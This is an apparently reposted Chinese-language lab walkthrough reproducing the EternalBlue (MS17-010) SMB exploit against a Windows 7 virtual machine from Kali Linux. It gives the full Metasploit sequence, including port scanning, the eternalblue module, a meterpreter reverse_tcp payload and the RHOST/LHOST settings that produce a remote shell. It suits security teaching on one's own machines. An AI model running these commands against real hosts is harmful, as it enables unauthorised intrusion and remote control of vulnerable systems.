天天动画片 > 八卦谈 > 永恒之蓝 MS17-010漏洞复现

永恒之蓝 MS17-010漏洞复现

八卦谈 佚名 2023-06-24 09:17:59

利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限,是一种使用MSF 实现 “永恒之蓝”的快速攻击。


攻击过程

【漏洞原理】

   永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。我们可以利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限

SMB是一种再局域网上共享文件和打印机的通信协议,它在局域网内使用Linux和Windows系统的机器之间提供文件及打印机资源的共享服务。

 

【攻击环境】

l  攻击方:Kali Linux 靶机:windows 7

l  利用工具:

  Kali Linux系统       IP:192.168.79.129

 Win7系统           IP:192.168.79.130   开放端口:445

 MSF框架版本:4.14.17版本以上

本次复现是利用搭建在VMware虚拟机上的,应注意VMware有如下三种网络模式:

桥连接 虚拟机的网络ip地址与我们的主机的ip在一个网段

Net模式 即网络装换模式,net模式就是使用vmnet8这个虚拟网卡进行通信的,这样主机就会有两个ip地址

主机模式 host-only模式,虚拟机完全是一个独立的主机,与主机不会互通也不能连接到网络

Ø  可能出现的问题:所有配置修改完成后发现仍然没有办法连接网络

Ø  解决办法:查看虚拟机的网卡的连接状态,确保其正确连接

Ø  在本次复现中,两个虚拟机使用桥连接或者Net模式都可,其目的是使靶机和攻击机能够互相通信。

Ø  设置网络连接的方法

  1.   点击左上角player(P)

  2. 点击管理(M)

  3. 点击虚拟机设置(S)

打开虚拟机设置

                                                 

    4.  点击网络适配器进行设置

    设置网络适配器


     

    【 攻击过程】

     

    一、     分别查看靶机和攻击机的IP

    靶机:

    命令:ipconfog

    攻击机:

    命令:ifconfog

    攻击机的IP和MAC地址


    二、 查看通信状态

    查看靶机和攻击机能否互相通信,

    命令:ping 对方ip地址

     

    三、信息收集

    1.  在终端输入msfconsole

    2.  使用syn扫描模块

    使用syn模块扫描端口 配置参数


    使用syn模块扫描端口 配置参数


          扫描的结果显示目标机器0-500的端口内开了135,139,445端口。而永恒之蓝利用的就是445端口的smb服务操作系统溢出漏洞

    3.  也可以不使用syn而使用nmap扫描(另一种扫描方法)

    使用nmap扫描端口

    收集到的信息显示靶机445端口开放,可以尝试使用ms17-010(永恒之蓝)来攻击。

    四、     尝试攻击

    1.      查看漏洞模块—search ms17-01

    2.      使用辅助扫描模块测试—use auxiliary/scanner/smb/smb_ms17_010

    3.      

      使用攻击模块进行攻击

    —use exploit/windows/smb/ms17_010_eternalblue

     set payload :设置payload,这里用

    —set payload windows/x64/meterpreter/reverse_tcp

    (要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload)

      —show options :使用该命令会列出使用当前模块所需配置的参数

      —set RHOST 目标主机地址  :该命令会设置好要攻击的目标主机地址

      —set LHOST  攻击机地址  :该命令设置攻击机的地址,使目标主机回连至攻击机

      —set LPORT  回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444

      —run:开始攻击

     攻击成功后攻击机和目标主机之间会建立一个连接,得到一个meterpreter会话

    使用ms17-010攻击过程


     部分攻击信息注解:

    ①    表示靶机容易利用ms17-010攻击

    ②    表示永恒之蓝覆盖完成

    ③    表示靶机和攻击机建立了一个shell连接,会话为session 1


     

    【攻击过程注意事项】

    1.     确保靶机和攻击机能够互相通信

    2.     确保靶机的防火墙已经关闭

    3.     若“查看漏洞模块——search ms17-01未成功找到对应模块,可能是metasploit需要更新,此时可在终端输入apt-get  install metasploit-framework

    4.     攻击过程可能导致目标系统宕机重启,此时重新输入run,便可再次攻击



    本文标题:永恒之蓝 MS17-010漏洞复现 - 八卦谈
    本文地址:www.ttdhp.com/article/34901.html

    天天动画片声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。
    扫码关注我们